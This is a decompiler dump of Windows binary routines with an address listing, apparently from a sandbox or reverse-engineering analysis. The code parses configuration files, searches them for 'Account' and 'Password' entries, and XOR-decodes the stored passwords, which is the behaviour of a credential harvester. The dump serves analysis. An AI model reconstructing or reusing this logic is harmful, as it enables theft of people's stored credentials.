				intOrPtr* _t514;
				signed int _t516;
				signed int _t517;
				intOrPtr* _t518;
				signed int _t521;
				intOrPtr* _t523;
				intOrPtr* _t525;
				signed char _t526;
				void* _t529;
				signed int _t534;
				void* _t543;
				void* _t544;
				void* _t545;
				void* _t546;
				void* _t547;
				void* _t548;
				void* _t549;
				signed int _t552;
				void* _t553;
				void* _t554;
				void* _t555;
				signed int _t556;
				void* _t557;
				signed int _t558;
				void* _t561;
				void* _t562;
				void* _t563;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t567;
				signed int _t568;
				void* _t569;
				signed int _t570;
				intOrPtr* _t571;
				intOrPtr* _t572;
				void* _t573;
				signed int _t576;
				void* _t577;
				intOrPtr* _t578;
				void* _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				void* _t583;
				void* _t584;
				signed int _t586;
				void* _t587;
				void* _t592;
				void* _t593;
				void* _t594;
				void* _t595;
				void* _t596;
				void* _t597;
				void* _t598;
				void* _t599;
				void* _t600;
				void* _t601;
				void* _t602;
				void* _t603;
				void* _t604;
				void* _t605;
				void* _t606;
				signed int _t607;
				void* _t608;
				void* _t609;
				void* _t610;
				void* _t611;

				_t567 = __esi;
				_t472 = __ebx;
				L000FBE9C(0x3090);
				_v8 =  *0x482960 ^ _t580;
				_t552 = _a4;
				_v12432 = 0;
				_t231 = E000FDB99( &_v12432, _a8, 0x474658);
				_t584 = _t583 + 0xc;
				if(_t231 != 0) {
					L55:
					__eflags = 0;
					_pop(_t553);
					return L000FBE87(0, _t472, _v8 ^ _t580, _t543, _t553, _t567);
				} else {
					_t613 = _v12432 - _t231;
					if(_v12432 == _t231) {
						goto L55;
					} else {
						_v136 = _t231;
						L000FCE0C( &_v135, _t231, 0x7f);
						_v904 = 0;
						L000FCE0C( &_v903, 0, 0xff);
						_v392 = 0;
						L000FCE0C( &_v391, 0, 0x7f);
						_v520 = 0;
						L000FCE0C( &_v519, 0, 0x7f);
						_v1916 = 0;
						L000FCE0C( &_v1915, 0, 0x1ff);
						_v648 = 0;
						L000FCE0C( &_v647, 0, 0x7f);
						_v264 = 0;
						L000FCE0C( &_v263, 0, 0x7f);
						_v2428 = 0;
						L000FCE0C( &_v2427, 0, 0x1ff);
						_push(0);
						_push(0x800);
						_push(_v12432);
						L000FDE9E(__ebx, _t552, __esi, _t613);
						_push(_v12432);
						_push(0x1388);
						_push( &_v7428);
						_t252 = E000FD996(__ebx, _t552, __esi, _t613);
						_t586 = _t584 + 0x78;
						if(_t252 == 0) {
							L30:
							_push(_v12432);
							E000FD91F(_t472, _t552, _t567, _t620);
							E000FC711( &_v136, 0x80, _t552);
							_t257 = L000FBD5C( &_v136, 0x40);
							_t587 = _t586 + 0x18;
							if(_t257 != 0) {
								 *_t257 = 0;
							}
							_t486 =  &_v392;
							_t544 = _t486 + 1;
							do {
								_t258 =  *_t486;
								_t486 = _t486 + 1;
							} while (_t258 != 0);
							if(_t486 - _t544 < 1) {
								E000FC711( &_v392, 0x80,  &_v136);
								_t587 = _t587 + 0xc;
							}
							_t488 =  &_v648;
							_t545 = _t488 + 1;
							do {
								_t259 =  *_t488;
								_t488 = _t488 + 1;
							} while (_t259 != 0);
							if(_t488 - _t545 < 1) {
								E000FC711( &_v648, 0x80,  &_v136);
								_t587 = _t587 + 0xc;
							}
							_t490 =  &_v520;
							_t546 = _t490 + 1;
							do {
								_t260 =  *_t490;
								_t490 = _t490 + 1;
							} while (_t260 != 0);
							if(_t490 != _t546) {
								_push(0);
								_push( &_v904);
								_t280 =  &_v520;
								_push(_t280);
								L111();
								_t587 = _t587 + 0xc;
								if(_t280 != 0) {
									E000FC711( &_v1404, 0x1f4, 0x474a84);
									_t283 =  *0x483d84;
									_t592 = _t587 + 0xc;
									_t629 = _t283;
									if(_t283 != 0) {
										_push( &_v1404);
										_push(0x474b44);
										_push(_t283);
										E000FDBDE(_t472, _t552, _t567, __eflags);
										_push(_t552);
										_push(0x474b58);
										_push( *0x483d84);
										E000FDBDE(_t472, _t552, _t567, __eflags);
										E000FDCF0( *0x483d84, 0x474b68,  &_v904);
										_push( *0x483d84);
										_push(0x474b78);
										E000FDD09(_t472, _t552, _t567, __eflags);
										_t587 = _t592 + 0x2c;
									} else {
										_push( &_v904);
										_push(_t552);
										_push( &_v1404);
										_push(0x474b2c);
										L000FDF32(_t552, _t567, _t629);
										_t587 = _t592 + 0x10;
									}
								}
							}
							_t492 =  &_v264;
							_t547 = _t492 + 1;
							do {
								_t261 =  *_t492;
								_t492 = _t492 + 1;
							} while (_t261 != 0);
							if(_t492 == _t547) {
								L54:
								_pop(_t554);
								__eflags = _v8 ^ _t580;
								return L000FBE87(1, _t472, _v8 ^ _t580, _t547, _t554, _t567);
							} else {
								_push(0);
								_push( &_v904);
								_t265 =  &_v264;
								_push(_t265);
								L111();
								if(_t265 == 0) {
									goto L54;
								} else {
									E000FC711( &_v1404, 0x1f4, 0x474a84);
									_t268 =  *0x483d84;
									_t633 = _t268;
									if(_t268 != 0) {
										_push( &_v1404);
										_push(0x474b44);
										_push(_t268);
										E000FDBDE(_t472, _t552, _t567, __eflags);
										_push(_t552);
										_push(0x474b58);
										_push( *0x483d84);
										E000FDBDE(_t472, _t552, _t567, __eflags);
										E000FDCF0( *0x483d84, 0x474b68,  &_v904);
										_push( *0x483d84);
										_push(0x474b78);
										E000FDD09(_t472, _t552, _t567, __eflags);
										goto L54;
									} else {
										_push( &_v904);
										_push(_t552);
										_push( &_v1404);
										L000FDF32(_t552, _t567, _t633);
										_t555 = 0x474b2c;
										return L000FBE87(1, _t472, _v8 ^ _t580, _t547, _t555, _t567);
									}
								}
							}
						} else {
							do {
								_t500 =  &_v7428;
								_t548 = _t500 + 1;
								do {
									_t298 =  *_t500;
									_t500 = _t500 + 1;
								} while (_t298 != 0);
								_t501 = _t500 - _t548;
								if(_t501 == 0) {
									L9:
									E000FC711( &_v12428, 0x1388,  &_v7428);
									E000FCA6C( &_v12428, 0x1388);
									_t305 = E000FCABC( &_v12428, 0x4748a4);
									_t593 = _t586 + 0x1c;
									if(_t305 == 0) {
										_t307 = E000FCABC( &_v12428, 0x4748b4);
										_t594 = _t593 + 8;
										__eflags = _t307;
										if(_t307 == 0) {
											_t309 = E000FCABC( &_v12428, 0x4748c4);
											_t595 = _t594 + 8;
											__eflags = _t309;
											if(_t309 == 0) {
												_t311 = E000FCABC( &_v12428, 0x4748d0);
												_t596 = _t595 + 8;
												__eflags = _t311;
												if(_t311 == 0) {
													_t313 = E000FCABC( &_v12428, 0x4748e0);
													_t597 = _t596 + 8;
													__eflags = _t313;
													if(_t313 == 0) {
														_t315 = E000FCABC( &_v12428, 0x4748f0);
														_t598 = _t597 + 8;
														__eflags = _t315;
														if(__eflags != 0) {
															_t319 = L000FBD5C( &_v7428, 0x3d);
															_t598 = _t598 + 8;
															__eflags = _t319;
															if(__eflags != 0) {
																_t320 = _t319 + 1;
																__eflags = _t320;
																_push(_t320);
																_t321 =  &_v2428;
																goto L27;
															}
														}
													} else {
														_t324 = L000FBD5C( &_v7428, 0x3d);
														_t598 = _t597 + 8;
														__eflags = _t324;
														if(__eflags != 0) {
															_push(_t324 + 1);
															_push(0x80);
															_t321 =  &_v264;
															goto L28;
														}
													}
												} else {
													_t327 = L000FBD5C( &_v7428, 0x3d);
													_t598 = _t596 + 8;
													__eflags = _t327;
													if(__eflags != 0) {
														_push(_t327 + 1);
														_push(0x80);
														_t321 =  &_v648;
														goto L28;
													}
												}
											} else {
												_t330 = L000FBD5C( &_v7428, 0x3d);
												_t598 = _t595 + 8;
												__eflags = _t330;
												if(__eflags != 0) {
													_push(_t330 + 1);
													_t321 =  &_v1916;
													L27:
													_push(0x200);
													goto L28;
												}
											}
										} else {
											_t333 = L000FBD5C( &_v7428, 0x3d);
											_t598 = _t594 + 8;
											__eflags = _t333;
											if(__eflags != 0) {
												_push(_t333 + 1);
												_push(0x80);
												_t321 =  &_v520;
												goto L28;
											}
										}
									} else {
										_t336 = L000FBD5C( &_v7428, 0x3d);
										_t598 = _t593 + 8;
										_t619 = _t336;
										if(_t336 != 0) {
											_push(_t336 + 1);
											_push(0x80);
											_t321 =  &_v392;
											L28:
											_push(_t321);
											E000FC711();
											_t598 = _t598 + 0xc;
										}
									}
									goto L29;
								} else {
									_t502 = _t501 - 1;
									if(_t502 >= 0x1388) {
										L000FCFD2();
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t581 = _t586;
										L000FBE9C(0x1228);
										_v16 =  *0x482960 ^ _t581;
										_t473 =  *0x474060(_v4, 0x80000000, 1, 0, 3, 0, 0, _t472, _t580);
										_v4656 = _t473;
										__eflags = _t473 - 0xffffffff;
										if(_t473 != 0xffffffff) {
											_t556 =  *0x474054(_t473, 0, 2, 0, 0, 0, _t552);
											_v4648 = _t556;
											__eflags = _t556;
											if(_t556 != 0) {
												_t568 =  *0x47404c(_t556, 4, 0, 0, 0, _t567);
												_v4640 = _t568;
												__eflags = _t568;
												if(_t568 != 0) {
													_v4644 = 0;
													_t348 =  *0x474040(_t473,  &_v4644);
													__eflags = _v4644;
													_v4656 = _t348;
													if(_v4644 != 0) {
														L109:
														_pop(_t569);
														_pop(_t557);
														__eflags = _v12 ^ _t581;
														_pop(_t474);
														return L000FBE87(_t348, _t474, _v12 ^ _t581, _t548, _t557, _t569);
													} else {
														_t475 = _t568;
														_t558 = _t348;
														_v24 = 0x63634100;
														_v20 = 0x746e756f;
														_v16 = 0;
														_v36 = 0x73615000;
														_v32 = 0x726f7773;
														_v28 = 0x64;
														_t506 = _t348;
														_t599 = _t586 + 0x10;
														_v4636 = _t506;
														__eflags = _t506;
														if(_t506 == 0) {
															goto L109;
														} else {
															while(1) {
																_v4120 = 0;
																_t107 = _t558 - 0x14; // -20
																_t108 = _t506 + 0x14; // 0x14
																_v2072 = 0;
																_v2584 = 0;
																_v292 = 0;
																_v548 = 0;
																_v3096 = 0;
																_v4632 = 0;
																_v1560 = 0;
																_v420 = 0;
																_v164 = 0;
																_t570 = E000A335C(_t108, _t107,  &_v24, 9);
																E000FD273( &_v1560, 0x200, _v4636 + 0x10,  *(_v4636 + 0xc) & 0x000000ff);
																_t509 = E000A335C(_t475, _t558,  &_v36, 9);
																_t600 = _t599 + 0x30;
																__eflags = _t509;
																if(_t509 == 0) {
																	goto L69;
																}
																__eflags = _t570;
																if(_t570 == 0) {
																	L68:
																	_t124 = _t509 + 0x11; // 0x11
																	E000FD273( &_v548, 0x80, _t124,  *(_t509 + 0xd) & 0x000000ff);
																	_push(1);
																	_push( &_v164);
																	_push( &_v548);
																	L111();
																	_t600 = _t600 + 0x1c;
																} else {
																	__eflags = _t509 - _t570;
																	if(_t509 < _t570) {
																		goto L68;
																	}
																}
																L69:
																_t510 = E000A335C(_t475, _t558, 0x4748fc, 0xc);
																_t601 = _t600 + 0x10;
																__eflags = _t510;
																if(_t510 != 0) {
																	__eflags = _t570;
																	if(_t570 == 0) {
																		L72:
																		_t129 = _t510 + 0x14; // 0x14
																		E000FD273( &_v292, 0x80, _t129,  *(_t510 + 0x10) & 0x000000ff);
																		_push(1);
																		_push( &_v420);
																		_push( &_v292);
																		L111();
																		_t601 = _t601 + 0x1c;
																	} else {
																		__eflags = _t510 - _t570;
																		if(_t510 < _t570) {
																			goto L72;
																		}
																	}
																}
																_t511 = E000A335C(_t475, _t558, 0x47490c, 0xa);
																_t599 = _t601 + 0x10;
																__eflags = _t511;
																if(_t511 == 0) {
																	L78:
																	_t512 =  &_v548;
																	_t549 = _t512 + 1;
																	do {
																		_t362 =  *_t512;
																		_t512 = _t512 + 1;
																		__eflags = _t362;
																	} while (_t362 != 0);
																	__eflags = _t512 - _t549 - 1;
																	if(_t512 - _t549 > 1) {
																		_t521 = E000A335C(_t475, _t558, 0x47491c, 0xe);
																		_t605 = _t599 + 0x10;
																		__eflags = _t521;
																		if(_t521 != 0) {
																			__eflags = _t570;
																			if(_t570 == 0) {
																				L84:
																				_t145 = _t521 + 0x16; // 0x16
																				E000FD273( &_v4632, 0x200, _t145,  *(_t521 + 0x12) & 0x000000ff);
																				_t605 = _t605 + 0x10;
																			} else {
																				__eflags = _t521 - _t570;
																				if(_t521 < _t570) {
																					goto L84;
																				}
																			}
																		}
																		E000FC711( &_v1048, 0x1f4, 0x474a84);
																		_t396 =  *0x483d84;
																		_t606 = _t605 + 0xc;
																		__eflags = _t396;
																		if(__eflags != 0) {
																			_push( &_v1048);
																			_push(0x474b44);
																			_push(_t396);
																			E000FDBDE(_t475, _t558, _t570, __eflags);
																			_push( &_v1560);
																			_push(0x474b58);
																			_push( *0x483d84);
																			E000FDBDE(_t475, _t558, _t570, __eflags);
																			E000FDCF0( *0x483d84, 0x474b68,  &_v164);
																			_push( *0x483d84);
																			_push(0x474b78);
																			E000FDD09(_t475, _t558, _t570, __eflags);
																			_t599 = _t606 + 0x2c;
																		} else {
																			_push( &_v164);
																			_push( &_v1560);
																			_push( &_v1048);
																			_push(0x474b2c);
																			L000FDF32(_t558, _t570, __eflags);
																			_t599 = _t606 + 0x10;
																		}
																	}
																	_t514 =  &_v292;
																	_t548 = _t514 + 1;
																	do {
																		_t363 =  *_t514;
																		_t514 = _t514 + 1;
																		__eflags = _t363;
																	} while (_t363 != 0);
																	__eflags = _t514 - _t548 - 1;
																	if(_t514 - _t548 > 1) {
																		_t516 = E000A335C(_t475, _t558, 0x47492c, 0xe);
																		_t602 = _t599 + 0x10;
																		__eflags = _t516;
																		if(_t516 != 0) {
																			__eflags = _t570;
																			if(_t570 == 0) {
																				L94:
																				_t157 = _t516 + 0x16; // 0x16
																				E000FD273( &_v3096, 0x200, _t157,  *(_t516 + 0x12) & 0x000000ff);
																				_t602 = _t602 + 0x10;
																			} else {
																				__eflags = _t516 - _t570;
																				if(_t516 < _t570) {
																					goto L94;
																				}
																			}
																		}
																		_t517 = E000A335C(_t475, _t558, 0x47493c, 0xf);
																		_t603 = _t602 + 0x10;
																		__eflags = _t517;
																		if(_t517 != 0) {
																			__eflags = _t570;
																			if(_t570 == 0) {
																				L98:
																				_t160 = _t517 + 0x17; // 0x17
																				E000FD273( &_v2072, 0x200, _t160,  *(_t517 + 0x13) & 0x000000ff);
																				_t603 = _t603 + 0x10;
																			} else {
																				__eflags = _t517 - _t570;
																				if(_t517 < _t570) {
																					goto L98;
																				}
																			}
																		}
																		_t518 =  &_v2072;
																		_t548 = _t518 + 1;
																		do {
																			_t368 =  *_t518;
																			_t518 = _t518 + 1;
																			__eflags = _t368;
																		} while (_t368 != 0);
																		__eflags = _t518 - _t548 - 1;
																		if(_t518 - _t548 < 1) {
																			E000FC711( &_v2072, 0x200,  &_v2584);
																			_t603 = _t603 + 0xc;
																		}
																		E000FC711( &_v1048, 0x1f4, 0x474a84);
																		_t371 =  *0x483d84;
																		_t604 = _t603 + 0xc;
																		__eflags = _t371;
																		if(__eflags != 0) {
																			_push( &_v1048);
																			_push(0x474b44);
																			_push(_t371);
																			E000FDBDE(_t475, _t558, _t570, __eflags);
																			_push( &_v1560);
																			_push(0x474b58);
																			_push( *0x483d84);
																			E000FDBDE(_t475, _t558, _t570, __eflags);
																			E000FDCF0( *0x483d84, 0x474b68,  &_v420);
																			_push( *0x483d84);
																			_push(0x474b78);
																			E000FDD09(_t475, _t558, _t570, __eflags);
																			_t599 = _t604 + 0x2c;
																		} else {
																			_push( &_v420);
																			_push( &_v1560);
																			_push( &_v1048);
																			_push(0x474b2c);
																			L000FDF32(_t558, _t570, __eflags);
																			_t599 = _t604 + 0x10;
																		}
																	}
																	__eflags = _t570;
																	if(_t570 == 0) {
																		 *0x474050(_v4640);
																		_t571 =  *0x474124;
																		 *_t571(_v4648);
																		_t348 =  *_t571(_v4652);
																		goto L109;
																	} else {
																		_t558 = _v4656 - _t570 + _v4640;
																		_t506 = _t570;
																		_t475 = _t570;
																		_v4636 = _t506;
																		continue;
																	}
																} else {
																	__eflags = _t570;
																	if(_t570 == 0) {
																		L76:
																		_v4636 = ( *(_t511 + 0xe) & 0x000000ff) + ( *(_t511 + 0xe) & 0x000000ff);
																		_t135 = _t511 + 0x12; // 0x12
																		E000FD453( &_v4120, 0x200, _t135, ( *(_t511 + 0xe) & 0x000000ff) + ( *(_t511 + 0xe) & 0x000000ff));
																		_t416 = _v4636;
																		_t607 = _t599 + 0x10;
																		__eflags = _t416 - 0x400;
																		if(_t416 >= 0x400) {
																			L000FCFD2();
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			_push(_t581);
																			_t582 = _t607;
																			_t608 = _t607 - 0x74;
																			_v112 =  *0x482960 ^ _t582;
																			asm("movq xmm0, [0x474884]");
																			_push(_t475);
																			_t476 = _v96;
																			_push(_t570);
																			_t572 = _v100;
																			_v116 =  *0x47488c & 0x000000ff;
																			asm("movq [ebp-0x10], xmm0");
																			asm("movq xmm0, [0x474890]");
																			_t523 = _t572;
																			_push(_t558);
																			_v224 = _t572;
																			_v220 = _t476;
																			asm("movq [ebp-0x1c], xmm0");
																			_v128 =  *0x474898 & 0x000000ff;
																			_v216 = 0;
																			_t561 = 0;
																			_t550 = _t523 + 1;
																			do {
																				_t422 =  *_t523;
																				_t523 = _t523 + 1;
																				__eflags = _t422;
																			} while (_t422 != 0);
																			__eflags = _t523 != _t550;
																			if(_t523 != _t550) {
																				_t525 = _t572;
																				_t550 = _t525 + 1;
																				do {
																					_t423 =  *_t525;
																					_t525 = _t525 + 1;
																					__eflags = _t423;
																				} while (_t423 != 0);
																				_t526 = _t525 - _t550;
																				__eflags = _t526 & 0x00000001;
																				if((_t526 & 0x00000001) != 0) {
																					goto L114;
																				} else {
																					__eflags = _a4;
																					if(_a4 == 0) {
																						_t197 =  &_v28; // 0x9ec40
																						E000FC711( &_v104, 0x40, _t197);
																						_v105 = 0x5a;
																					} else {
																						E000FC711( &_v104, 0x40,  &_v40);
																						_v105 = 0x71;
																					}
																					_t609 = _t608 + 0xc;
																					 *_t476 = 0;
																					_t529 = _t572 + 1;
																					do {
																						_t429 =  *_t572;
																						_t572 = _t572 + 1;
																						__eflags = _t429;
																					} while (_t429 != 0);
																					_t478 = _v128;
																					L000FDFDE(_t478, 0x47489c,  &_v116);
																					_v116 = _v116 ^ _v105 & 0x000000ff;
																					_t610 = _t609 + 0xc;
																					_t479 = _t478 + 2;
																					_t576 = (_t572 - _t529 >> 1) - 1;
																					__eflags = _t576;
																					if(_t576 != 0) {
																						do {
																							_t576 = _t576 - 1;
																							L000FDFDE(_t479, 0x47489c,  &_v112);
																							_t534 = _v112 ^  *(_t582 + _t561 - 0x5c);
																							_t439 = _v116;
																							_t611 = _t610 + 0xc;
																							_t564 = _t561 + 1;
																							_v112 = _t534;
																							__eflags = _t439 - _t534;
																							if(_t439 >= _t534) {
																								_t534 = _t534 - 1;
																								__eflags = _t534;
																								_v112 = _t534;
																							}
																							_t550 = _v124;
																							_t441 = _v120 + 1;
																							 *((char*)(_v124 + _t441 - 1)) = _t534 - _t439;
																							_v120 = _t441;
																							L000FDFDE(_t479, 0x47489c,  &_v116);
																							_t610 = _t611 + 0xc;
																							_t479 = _t479 + 2;
																							__eflags =  *(_t582 + _t564 - 0x5c);
																							_t561 =  ==  ? 0 : _t564;
																							__eflags = _t576;
																						} while (_t576 != 0);
																					}
																					_pop(_t563);
																					 *((char*)(_v124 + _v120)) = 0;
																					_pop(_t577);
																					__eflags = _v16 ^ _t582;
																					_pop(_t480);
																					return L000FBE87(1, _t480, _v16 ^ _t582, _t550, _t563, _t577);
																				}
																			} else {
																				L114:
																				_pop(_t562);
																				_pop(_t573);
																				_pop(_t477);
																				__eflags = _v16 ^ _t582;
																				return L000FBE87(0, _t477, _v16 ^ _t582, _t550, _t562, _t573);
																			}
																		} else {
																			__eflags = 0;
																			 *((short*)(_t581 + _t416 - 0x1010)) = 0;
																			swprintf( &_v2584, 0x200, 0x474918,  &_v4120);
																			_t599 = _t607 + 0x10;
																			goto L78;
																		}
																	} else {
																		__eflags = _t511 - _t570;
																		if(_t511 >= _t570) {
																			goto L78;
																		} else {
																			goto L76;
																		}
																	}
																}
																goto L128;
															}
														}
													}
												} else {
													 *0x47412c();
													_t578 =  *0x474124;
													 *_t578();
													_t465 =  *_t578();
													_t579 = _t556;
													_t565 = _t473;
													_pop(_t481);
													__eflags = _v12 ^ _t581;
													return L000FBE87(_t465, _t481, _v12 ^ _t581, _t548, _t565, _t579);
												}
											} else {
												 *0x47412c();
												_t468 =  *0x474124();
												_t566 = _t473;
												_pop(_t482);
												__eflags = _v12 ^ _t581;
												return L000FBE87(_t468, _t482, _v12 ^ _t581, _t548, _t566, _t567);
											}
										} else {
											_t470 =  *0x47412c();
											_pop(_t483);
											__eflags = _v12 ^ _t581;
											return L000FBE87(_t470, _t483, _v12 ^ _t581, _t548, _t552, _t567);
										}
									} else {
										 *((char*)(_t580 + _t502 - 0x1d00)) = _t298;
										goto L9;
									}
								}
								goto L128;
								L29:
								_push(_v12432);
								_push(0x1388);
								_push( &_v7428);
								_t317 = E000FD996(_t472, _t552, _t567, _t619);
								_t586 = _t598 + 0xc;
								_t620 = _t317;
							} while (_t317 != 0);
							goto L30;
						}
					}
				}
				L128:
			}






































































































































































































                                                                                                                    0x0009e75c
                                                                                                                    0x0009e75c
                                                                                                                    0x0009e764
                                                                                                                    0x0009e770
                                                                                                                    0x0009e777
                                                                                                                    0x0009e787
                                                                                                                    0x0009e791
                                                                                                                    0x0009e796
                                                                                                                    0x0009e79b
                                                                                                                    0x0009ecfe
                                                                                                                    0x0009ed03
                                                                                                                    0x0009ed05
                                                                                                                    0x0009ed0e
                                                                                                                    0x0009e7a1
                                                                                                                    0x0009e7a1
                                                                                                                    0x0009e7a7
                                                                                                                    0x00000000
                                                                                                                    0x0009e7ad
                                                                                                                    0x0009e7b0
                                                                                                                    0x0009e7bd
                                                                                                                    0x0009e7d0
                                                                                                                    0x0009e7d7
                                                                                                                    0x0009e7e7
                                                                                                                    0x0009e7ee
                                                                                                                    0x0009e7fe
                                                                                                                    0x0009e805
                                                                                                                    0x0009e818
                                                                                                                    0x0009e81f
                                                                                                                    0x0009e82f
                                                                                                                    0x0009e836
                                                                                                                    0x0009e849
                                                                                                                    0x0009e850
                                                                                                                    0x0009e863
                                                                                                                    0x0009e86a
                                                                                                                    0x0009e86f
                                                                                                                    0x0009e871
                                                                                                                    0x0009e876
                                                                                                                    0x0009e87c
                                                                                                                    0x0009e881
                                                                                                                    0x0009e88d
                                                                                                                    0x0009e892
                                                                                                                    0x0009e893
                                                                                                                    0x0009e898
                                                                                                                    0x0009e89d
                                                                                                                    0x0009eaa9
                                                                                                                    0x0009eaa9
                                                                                                                    0x0009eaaf
                                                                                                                    0x0009eac1
                                                                                                                    0x0009eacf
                                                                                                                    0x0009ead4
                                                                                                                    0x0009ead9
                                                                                                                    0x0009eadb
                                                                                                                    0x0009eadb
                                                                                                                    0x0009eade
                                                                                                                    0x0009eae4
                                                                                                                    0x0009eaec
                                                                                                                    0x0009eaec
                                                                                                                    0x0009eaee
                                                                                                                    0x0009eaef
                                                                                                                    0x0009eaf8
                                                                                                                    0x0009eb0d
                                                                                                                    0x0009eb12
                                                                                                                    0x0009eb12
                                                                                                                    0x0009eb15
                                                                                                                    0x0009eb1b
                                                                                                                    0x0009eb1e
                                                                                                                    0x0009eb1e
                                                                                                                    0x0009eb20
                                                                                                                    0x0009eb21
                                                                                                                    0x0009eb2a
                                                                                                                    0x0009eb3f
                                                                                                                    0x0009eb44
                                                                                                                    0x0009eb44
                                                                                                                    0x0009eb47
                                                                                                                    0x0009eb4d
                                                                                                                    0x0009eb50
                                                                                                                    0x0009eb50
                                                                                                                    0x0009eb52
                                                                                                                    0x0009eb53
                                                                                                                    0x0009eb59
                                                                                                                    0x0009eb5f
                                                                                                                    0x0009eb67
                                                                                                                    0x0009eb68
                                                                                                                    0x0009eb6e
                                                                                                                    0x0009eb6f
                                                                                                                    0x0009eb74
                                                                                                                    0x0009eb79
                                                                                                                    0x0009eb90
                                                                                                                    0x0009eb95
                                                                                                                    0x0009eb9a
                                                                                                                    0x0009eb9d
                                                                                                                    0x0009eb9f
                                                                                                                    0x0009ebc5
                                                                                                                    0x0009ebc6
                                                                                                                    0x0009ebcb
                                                                                                                    0x0009ebcc
                                                                                                                    0x0009ebd1
                                                                                                                    0x0009ebd2
                                                                                                                    0x0009ebd7
                                                                                                                    0x0009ebdd
                                                                                                                    0x0009ebf4
                                                                                                                    0x0009ebf9
                                                                                                                    0x0009ebff
                                                                                                                    0x0009ec04
                                                                                                                    0x0009ec09
                                                                                                                    0x0009eba1
                                                                                                                    0x0009eba7
                                                                                                                    0x0009eba8
                                                                                                                    0x0009ebaf
                                                                                                                    0x0009ebb0
                                                                                                                    0x0009ebb5
                                                                                                                    0x0009ebba
                                                                                                                    0x0009ebba
                                                                                                                    0x0009eb9f
                                                                                                                    0x0009eb79
                                                                                                                    0x0009ec0c
                                                                                                                    0x0009ec12
                                                                                                                    0x0009ec1c
                                                                                                                    0x0009ec1c
                                                                                                                    0x0009ec1e
                                                                                                                    0x0009ec1f
                                                                                                                    0x0009ec25
                                                                                                                    0x0009ecea
                                                                                                                    0x0009ecef
                                                                                                                    0x0009ecf3
                                                                                                                    0x0009ecfd
                                                                                                                    0x0009ec2b
                                                                                                                    0x0009ec2b
                                                                                                                    0x0009ec33
                                                                                                                    0x0009ec34
                                                                                                                    0x0009ec3a
                                                                                                                    0x0009ec3b
                                                                                                                    0x0009ec45
                                                                                                                    0x00000000
                                                                                                                    0x0009ec4b
                                                                                                                    0x0009ec5c
                                                                                                                    0x0009ec61
                                                                                                                    0x0009ec69
                                                                                                                    0x0009ec6b
                                                                                                                    0x0009eca3
                                                                                                                    0x0009eca4
                                                                                                                    0x0009eca9
                                                                                                                    0x0009ecaa
                                                                                                                    0x0009ecaf
                                                                                                                    0x0009ecb0
                                                                                                                    0x0009ecb5
                                                                                                                    0x0009ecbb
                                                                                                                    0x0009ecd2
                                                                                                                    0x0009ecd7
                                                                                                                    0x0009ecdd
                                                                                                                    0x0009ece2
                                                                                                                    0x00000000
                                                                                                                    0x0009ec6d
                                                                                                                    0x0009ec73
                                                                                                                    0x0009ec74
                                                                                                                    0x0009ec7b
                                                                                                                    0x0009ec81
                                                                                                                    0x0009ec8e
                                                                                                                    0x0009ec9c
                                                                                                                    0x0009ec9c
                                                                                                                    0x0009ec6b
                                                                                                                    0x0009ec45
                                                                                                                    0x0009e8a3
                                                                                                                    0x0009e8ac
                                                                                                                    0x0009e8ac
                                                                                                                    0x0009e8b2
                                                                                                                    0x0009e8bc
                                                                                                                    0x0009e8bc
                                                                                                                    0x0009e8be
                                                                                                                    0x0009e8bf
                                                                                                                    0x0009e8c3
                                                                                                                    0x0009e8c5
                                                                                                                    0x0009e8db
                                                                                                                    0x0009e8ee
                                                                                                                    0x0009e8ff
                                                                                                                    0x0009e910
                                                                                                                    0x0009e915
                                                                                                                    0x0009e91a
                                                                                                                    0x0009e953
                                                                                                                    0x0009e958
                                                                                                                    0x0009e95b
                                                                                                                    0x0009e95d
                                                                                                                    0x0009e996
                                                                                                                    0x0009e99b
                                                                                                                    0x0009e99e
                                                                                                                    0x0009e9a0
                                                                                                                    0x0009e9d4
                                                                                                                    0x0009e9d9
                                                                                                                    0x0009e9dc
                                                                                                                    0x0009e9de
                                                                                                                    0x0009ea14
                                                                                                                    0x0009ea19
                                                                                                                    0x0009ea1c
                                                                                                                    0x0009ea1e
                                                                                                                    0x0009ea50
                                                                                                                    0x0009ea55
                                                                                                                    0x0009ea58
                                                                                                                    0x0009ea5a
                                                                                                                    0x0009ea65
                                                                                                                    0x0009ea6a
                                                                                                                    0x0009ea6d
                                                                                                                    0x0009ea6f
                                                                                                                    0x0009ea71
                                                                                                                    0x0009ea71
                                                                                                                    0x0009ea72
                                                                                                                    0x0009ea73
                                                                                                                    0x00000000
                                                                                                                    0x0009ea73
                                                                                                                    0x0009ea6f
                                                                                                                    0x0009ea20
                                                                                                                    0x0009ea29
                                                                                                                    0x0009ea2e
                                                                                                                    0x0009ea31
                                                                                                                    0x0009ea33
                                                                                                                    0x0009ea36
                                                                                                                    0x0009ea37
                                                                                                                    0x0009ea3c
                                                                                                                    0x00000000
                                                                                                                    0x0009ea3c
                                                                                                                    0x0009ea33
                                                                                                                    0x0009e9e0
                                                                                                                    0x0009e9e9
                                                                                                                    0x0009e9ee
                                                                                                                    0x0009e9f1
                                                                                                                    0x0009e9f3
                                                                                                                    0x0009e9fa
                                                                                                                    0x0009e9fb
                                                                                                                    0x0009ea00
                                                                                                                    0x00000000
                                                                                                                    0x0009ea00
                                                                                                                    0x0009e9f3
                                                                                                                    0x0009e9a2
                                                                                                                    0x0009e9ab
                                                                                                                    0x0009e9b0
                                                                                                                    0x0009e9b3
                                                                                                                    0x0009e9b5
                                                                                                                    0x0009e9bc
                                                                                                                    0x0009e9bd
                                                                                                                    0x0009ea79
                                                                                                                    0x0009ea79
                                                                                                                    0x00000000
                                                                                                                    0x0009ea79
                                                                                                                    0x0009e9b5
                                                                                                                    0x0009e95f
                                                                                                                    0x0009e968
                                                                                                                    0x0009e96d
                                                                                                                    0x0009e970
                                                                                                                    0x0009e972
                                                                                                                    0x0009e979
                                                                                                                    0x0009e97a
                                                                                                                    0x0009e97f
                                                                                                                    0x00000000
                                                                                                                    0x0009e97f
                                                                                                                    0x0009e972
                                                                                                                    0x0009e91c
                                                                                                                    0x0009e925
                                                                                                                    0x0009e92a
                                                                                                                    0x0009e92d
                                                                                                                    0x0009e92f
                                                                                                                    0x0009e936
                                                                                                                    0x0009e937
                                                                                                                    0x0009e93c
